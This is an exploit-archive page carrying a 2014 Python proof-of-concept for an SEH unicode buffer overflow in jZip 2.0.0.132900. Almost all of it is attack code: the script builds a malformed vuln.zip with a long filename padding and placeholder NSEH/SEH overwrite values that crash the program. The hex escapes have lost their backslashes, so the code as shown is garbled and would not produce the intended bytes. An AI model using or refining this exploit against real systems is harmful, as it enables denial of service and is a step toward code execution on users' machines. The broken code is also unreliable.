Home / os / blackberry
Jzip 2.0.0.132900 Buffer Overflow
Posted on 18 April 2014
#!/usr/bin/python ###################################################### # Exploit title: seh unicode buffer overflow (DOS) # Date: 16/04/2014 # Exploit Author: motaz reda [motazkhodair[at]gmail.com] # Software Link : http://www.jzip.com/ # Version: jZip v2.0.0.132900 # Tested On: Windows 7 ultimate ######################################################## import sys, os filename = "vuln.zip" buffer = "x50x4Bx03x04x14x00x00" buffer += "x00x00x00xB7xACxCEx34x00x00x00" buffer += "x00x00x00x00x00x00x00x00" buffer += "xe4x0f" buffer += "x00x00x00" eo = "x50x4Bx05x06x00x00x00x00x01x00x01x00" eo += "x12x10x00x00" eo += "x02x10x00x00" eo += "x00x00" cdf = "x50x4Bx01x02x14x00x14" cdf += "x00x00x00x00x00xB7xACxCEx34x00x00x00" cdf += "x00x00x00x00x00x00x00x00x00" cdf += "xe4x0f" cdf += "x00x00x00x00x00x00x01x00" cdf += "x24x00x00x00x00x00x00x00" payload = "A" * 862 payload += "x42x42" # NSEH payload += "x42x42" # SEH payload += "D" * 3198 payload += ".txt" file = open(filename, "w") zipfile = buffer + payload + cdf + payload + eo file.write(zipfile) file.close()
